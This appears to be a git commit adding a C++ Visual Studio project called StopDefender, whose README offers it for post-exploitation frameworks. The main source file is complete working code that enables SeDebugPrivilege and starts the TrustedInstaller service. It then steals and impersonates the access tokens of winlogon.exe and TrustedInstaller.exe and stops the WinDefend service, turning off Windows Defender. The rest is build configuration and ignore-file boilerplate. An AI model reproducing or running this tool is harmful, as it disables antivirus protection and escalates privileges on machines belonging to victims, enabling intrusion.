updates and moves

n/a
2026-06-16 07:49:24 +00:00 · 2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
@@ -0,0 +1,63 @@
+###############################################################################
+# Set default behavior to automatically normalize line endings.
+###############################################################################
+* text=auto
+
+###############################################################################
+# Set default behavior for command prompt diff.
+#
+# This is need for earlier builds of msysgit that does not have it on by
+# default for csharp files.
+# Note: This is only used by command line
+###############################################################################
+#*.cs     diff=csharp
+
+###############################################################################
+# Set the merge driver for project and solution files
+#
+# Merging from the command prompt will add diff markers to the files if there
+# are conflicts (Merging from VS is not affected by the settings below, in VS
+# the diff markers are never inserted). Diff markers may cause the following 
+# file extensions to fail to load in VS. An alternative would be to treat
+# these files as binary and thus will always conflict and require user
+# intervention with every merge. To do so, just uncomment the entries below
+###############################################################################
+#*.sln       merge=binary
+#*.csproj    merge=binary
+#*.vbproj    merge=binary
+#*.vcxproj   merge=binary
+#*.vcproj    merge=binary
+#*.dbproj    merge=binary
+#*.fsproj    merge=binary
+#*.lsproj    merge=binary
+#*.wixproj   merge=binary
+#*.modelproj merge=binary
+#*.sqlproj   merge=binary
+#*.wwaproj   merge=binary
+
+###############################################################################
+# behavior for image files
+#
+# image files are treated as binary by default.
+###############################################################################
+#*.jpg   binary
+#*.png   binary
+#*.gif   binary
+
+###############################################################################
+# diff behavior for common document formats
+# 
+# Convert binary document formats to text before diffing them. This feature
+# is only available from the command line. Turn it on by uncommenting the 
+# entries below.
+###############################################################################
+#*.doc   diff=astextplain
+#*.DOC   diff=astextplain
+#*.docx  diff=astextplain
+#*.DOCX  diff=astextplain
+#*.dot   diff=astextplain
+#*.DOT   diff=astextplain
+#*.pdf   diff=astextplain
+#*.PDF   diff=astextplain
+#*.rtf   diff=astextplain
+#*.RTF   diff=astextplain
@@ -0,0 +1,242 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+[Xx]64/
+[Xx]86/
+[Bb]uild/
+bld/
+[Bb]in/
+[Oo]bj/
+
+# Visual Studio 2015 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUNIT
+*.VisualState.xml
+TestResult.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# DNX
+project.lock.json
+artifacts/
+
+*_i.c
+*_p.c
+*_i.h
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+
+# TODO: Un-comment the next line if you do not want to checkin
+# your web deploy settings because they may include unencrypted
+# passwords
+#*.pubxml
+*.publishproj
+
+# NuGet Packages
+*.nupkg
+# The packages folder can be ignored because of Package Restore
+**/packages/*
+# except build/, which is used as an MSBuild target.
+!**/packages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/packages/repositories.config
+# NuGet v3's project.json files produces more ignoreable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directory
+AppPackages/
+BundleArtifacts/
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!*.[Cc]ache/
+
+# Others
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.pfx
+*.publishsettings
+node_modules/
+orleans.codegen.cs
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+*.mdf
+*.ldf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# LightSwitch generated files
+GeneratedArtifacts/
+ModelManifest.xml
+
+# Paket dependency manager
+.paket/paket.exe
+
+# FAKE - F# Make
+.fake/
@@ -0,0 +1,19 @@
+# StopDefender
+Stop Windows Defender programmatically using Steal token from TrustedInstaller and winlogon processes.
+
+![](Img/TI.png)
+
+One button stop action, no need for supply commandline options nor pid. Usefull for integration with Post Explotation frameworks.
+
+![](Img/TIexec.png)
+
+# Blogpost
+https://www.securityartwork.es/2021/09/27/trustedinstaller-parando-windows-defender/
+
+# Credits
+* https://github.com/slyd0g/PrimaryTokenTheft
+* https://posts.specterops.io/understanding-and-defending-against-access-token-theft-finding-alternatives-to-winlogon-exe-80696c8a73b
+* https://www.tiraniddo.dev/2017/08/the-art-of-becoming-trustedinstaller.html
+* https://docs.microsoft.com/en-us/windows/win32/com/impersonation-levels
+* https://halove23.blogspot.com/2021/08/executing-code-in-context-of-trusted.html
+* https://docs.microsoft.com/es-es/windows/win32/api/winsvc/ns-winsvc-service_sid_info?redirectedfrom=MSDN
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StopDefender", "StopDefender\StopDefender.vcxproj", "{081FD037-C08F-421D-B9F1-DA99AC467715}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Debug|x64.ActiveCfg = Debug|x64
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Debug|x64.Build.0 = Debug|x64
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Debug|x86.ActiveCfg = Debug|Win32
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Debug|x86.Build.0 = Debug|Win32
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Release|x64.ActiveCfg = Release|x64
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Release|x64.Build.0 = Release|x64
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Release|x86.ActiveCfg = Release|Win32
+		{081FD037-C08F-421D-B9F1-DA99AC467715}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,325 @@
+#include "stdafx.h"
+#include <windows.h>
+#include <iostream>
+#include <cstdio>
+#include <tlhelp32.h>
+#include <Lmcons.h>
+
+
+
+BOOL SetPrivilege(
+	HANDLE hToken,          // access token handle
+	LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
+	BOOL bEnablePrivilege   // to enable or disable privilege
+)
+{
+	TOKEN_PRIVILEGES tp;
+	LUID luid;
+
+	if (!LookupPrivilegeValue(
+		NULL,            // lookup privilege on local system
+		lpszPrivilege,   // privilege to lookup 
+		&luid))        // receives LUID of privilege
+	{
+		printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
+		return FALSE;
+	}
+
+	tp.PrivilegeCount = 1;
+	tp.Privileges[0].Luid = luid;
+	if (bEnablePrivilege)
+		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+	else
+		tp.Privileges[0].Attributes = 0;
+
+	// Enable the privilege or disable all privileges.
+
+	if (!AdjustTokenPrivileges(
+		hToken,
+		FALSE,
+		&tp,
+		sizeof(TOKEN_PRIVILEGES),
+		(PTOKEN_PRIVILEGES)NULL,
+		(PDWORD)NULL))
+	{
+		printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
+		return FALSE;
+	}
+
+	if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
+
+	{
+		printf("[-] The token does not have the specified privilege. \n");
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+std::string get_username()
+{
+	TCHAR username[UNLEN + 1];
+	DWORD username_len = UNLEN + 1;
+	GetUserName(username, &username_len);
+	std::wstring username_w(username);
+	std::string username_s(username_w.begin(), username_w.end());
+	return username_s;
+}
+
+BOOL StopDefenderService() {
+	SERVICE_STATUS_PROCESS ssp;
+
+	SC_HANDLE schSCManager = OpenSCManager(
+		NULL,                    // local computer
+		NULL,                    // ServicesActive database 
+		SC_MANAGER_ALL_ACCESS);  // full access rights 
+
+	if (NULL == schSCManager)
+	{
+		printf("[-] OpenSCManager failed (%d)\n", GetLastError());
+		return FALSE;
+	}
+
+	printf("[+] OpenSCManager success!\n");
+
+	SC_HANDLE schService = OpenService(
+		schSCManager,         // SCM database 
+		L"WinDefend",            // name of service 
+		SERVICE_STOP |
+		SERVICE_QUERY_STATUS |
+		SERVICE_ENUMERATE_DEPENDENTS);
+
+	if (schService == NULL)
+	{
+		printf("[-] OpenService failed (%d)\n", GetLastError());
+		CloseServiceHandle(schSCManager);
+		return FALSE;
+	}
+	printf("[+] OpenService success!\n");
+
+	//Stopping service
+
+	if (!ControlService(
+		schService,
+		SERVICE_CONTROL_STOP,
+		(LPSERVICE_STATUS)&ssp))
+	{
+		printf("[-] ControlService failed (%d)\n", GetLastError());
+		CloseServiceHandle(schService);
+		CloseServiceHandle(schSCManager);
+		return FALSE;
+	}
+
+}
+
+BOOL StartTrustedInstallerService() {
+	// Get a handle to the SCM database. 
+
+	SC_HANDLE schSCManager = OpenSCManager(
+		NULL,                    // local computer
+		NULL,                    // servicesActive database 
+		SC_MANAGER_ALL_ACCESS);  // full access rights 
+
+	if (NULL == schSCManager)
+	{
+		printf("[-] OpenSCManager failed (%d)\n", GetLastError());
+		return FALSE;
+	}
+	printf("[+] OpenSCManager success!\n");
+
+	// Get a handle to the service.
+
+	SC_HANDLE schService = OpenService(
+		schSCManager,         // SCM database 
+		L"TrustedInstaller",  // name of service 
+		SERVICE_START);  // full access 
+
+	if (schService == NULL)
+	{
+		printf("[-] OpenService failed (%d)\n", GetLastError());
+		CloseServiceHandle(schSCManager);
+		return FALSE;
+	}
+
+	// Attempt to start the service.
+
+	if (!StartService(
+		schService,  // handle to service 
+		0,           // number of arguments 
+		NULL))      // no arguments 
+	{
+		printf("[-] StartService failed (%d)\n", GetLastError());
+		CloseServiceHandle(schService);
+		CloseServiceHandle(schSCManager);
+		return FALSE;
+	}
+
+	Sleep(2000);
+	CloseServiceHandle(schService);
+	CloseServiceHandle(schSCManager);
+
+	return TRUE;
+}
+
+int GetProcessByName(PCWSTR name)
+{
+	DWORD pid = 0;
+
+	// Create toolhelp snapshot.
+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	PROCESSENTRY32 process;
+	ZeroMemory(&process, sizeof(process));
+	process.dwSize = sizeof(process);
+
+	// Walkthrough all processes.
+	if (Process32First(snapshot, &process))
+	{
+		do
+		{
+			// Compare process.szExeFile based on format of name, i.e., trim file path
+			// trim .exe if necessary, etc.
+			if (wcscmp(process.szExeFile, name) == 0)
+			{
+				return process.th32ProcessID;
+			}
+		} while (Process32Next(snapshot, &process));
+	}
+
+	CloseHandle(snapshot);
+
+	return NULL;
+}
+
+int main(int argc, char** argv) {
+
+	// Initialize variables and structures
+	HANDLE tokenHandle = NULL;
+	HANDLE duplicateTokenHandle = NULL;
+	STARTUPINFO startupInfo;
+	PROCESS_INFORMATION processInformation;
+	ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
+	ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
+	startupInfo.cb = sizeof(STARTUPINFO);
+
+
+	// Add SE debug privilege
+	HANDLE currentTokenHandle = NULL;
+	BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
+	if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
+	{
+		printf("[+] SeDebugPrivilege enabled!\n");
+	}
+
+
+	// Starting TI service from SC Manager
+	if (StartTrustedInstallerService())
+		printf("[+] TrustedInstaller Service Started!\n");
+	else {
+		exit (1);
+	}
+
+	// Print whoami to compare to thread later
+	printf("[+] Current user is: %s\n", (get_username()).c_str());
+
+	// Searching for Winlogon PID 
+	DWORD PID_TO_IMPERSONATE = GetProcessByName(L"winlogon.exe");
+
+	if (PID_TO_IMPERSONATE == NULL) {
+		printf("[-] Winlogon process not found\n");
+		exit(1);
+	}else
+		printf("[+] Winlogon process found!\n");
+
+	// Searching for TrustedInstaller PID 
+	DWORD PID_TO_IMPERSONATE_TI = GetProcessByName(L"TrustedInstaller.exe");
+
+	if (PID_TO_IMPERSONATE_TI == NULL) {
+		printf("[-] TrustedInstaller process not found\n");
+		exit(1);
+	}
+	else
+		printf("[+] TrustedInstaller process found!\n");
+
+	// Call OpenProcess() to open WINLOGON, print return code and error code
+	HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, PID_TO_IMPERSONATE);
+	if (GetLastError() == NULL)
+		printf("[+] WINLOGON OpenProcess() success!\n");
+	else
+	{
+		printf("[-] WINLOGON OpenProcess() Return Code: %i\n", processHandle);
+		printf("[-] WINLOGON OpenProcess() Error: %i\n", GetLastError());
+	}
+
+	// Call OpenProcessToken(), print return code and error code
+	BOOL getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &tokenHandle);
+	if (GetLastError() == NULL)
+		printf("[+] WINLOGON OpenProcessToken() success!\n");
+	else
+	{
+		printf("[-] WINLOGON OpenProcessToken() Return Code: %i\n", getToken);
+		printf("[-] WINLOGON OpenProcessToken() Error: %i\n", GetLastError());
+	}
+
+	// Impersonate user in a thread
+	BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
+	if (GetLastError() == NULL)
+	{
+		printf("[+] WINLOGON ImpersonatedLoggedOnUser() success!\n");
+		printf("[+] WINLOGON Current user is: %s\n", (get_username()).c_str());
+	}
+	else
+	{
+		printf("[-] WINLOGON ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
+		printf("[-] WINLOGON ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
+	}
+
+	// Closing not necessary handles
+
+	CloseHandle(processHandle);
+	CloseHandle(tokenHandle);
+
+
+	// Call OpenProcess() to open TRUSTEDINSTALLER, print return code and error code
+	processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, PID_TO_IMPERSONATE_TI);
+	if (GetLastError() == NULL)
+		printf("[+] TRUSTEDINSTALLER OpenProcess() success!\n");
+	else
+	{
+		printf("[-] TRUSTEDINSTALLER OpenProcess() Return Code: %i\n", processHandle);
+		printf("[-] TRUSTEDINSTALLER OpenProcess() Error: %i\n", GetLastError());
+	}
+
+	// Call OpenProcessToken(), print return code and error code
+	getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &tokenHandle);
+	if (GetLastError() == NULL)
+		printf("[+] TRUSTEDINSTALLER OpenProcessToken() success!\n");
+	else
+	{
+		printf("[-] TRUSTEDINSTALLER OpenProcessToken() Return Code: %i\n", getToken);
+		printf("[-] TRUSTEDINSTALLER OpenProcessToken() Error: %i\n", GetLastError());
+	}
+
+	// Impersonate user in a thread
+	impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
+	if (GetLastError() == NULL)
+	{
+		printf("[+] TRUSTEDINSTALLER ImpersonatedLoggedOnUser() success!\n");
+		printf("[+] Current user is: %s\n", (get_username()).c_str());
+	}
+	else
+	{
+		printf("[-] TRUSTEDINSTALLER ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
+		printf("[-] TRUSTEDINSTALLER ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
+	}
+
+
+	if (StopDefenderService()) {
+		printf("[+] TRUSTEDINSTALLER StopDefenderService() success!\n");
+	}
+	else {
+		printf("[-] TRUSTEDINSTALLER StopDefenderService() Error: %i\n", GetLastError());
+	}
+
+	getchar();
+	return 0;
+}
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Archivos de código fuente">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Archivos de encabezado">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Archivos de recursos">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Archivos de encabezado</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Archivos de encabezado</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Archivos de código fuente</Filter>
+    </ClCompile>
+    <ClCompile Include="stealToken.cpp">
+      <Filter>Archivos de código fuente</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,164 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{081FD037-C08F-421D-B9F1-DA99AC467715}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>StopDefender</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="StopDefender.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp" />
+    <ClCompile Include="StopDefender.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+</Project>
@@ -0,0 +1,8 @@
+// stdafx.cpp: archivo de código fuente que contiene sólo las inclusiones estándar
+// stealToken.pch será el encabezado precompilado
+// stdafx.obj contiene la información de tipos precompilada
+
+#include "stdafx.h"
+
+// TODO: mencionar los encabezados adicionales que se necesitan en STDAFX.H
+// pero no en este archivo
@@ -0,0 +1,15 @@
+// stdafx.h: archivo de inclusión de los archivos de inclusión estándar del sistema
+// o archivos de inclusión específicos de un proyecto utilizados frecuentemente,
+// pero rara vez modificados
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <stdio.h>
+#include <tchar.h>
+
+
+
+// TODO: mencionar aquí los encabezados adicionales que el programa necesita
@@ -0,0 +1,8 @@
+#pragma once
+
+// La inclusión de SDKDDKVer.h define la plataforma Windows más alta disponible.
+
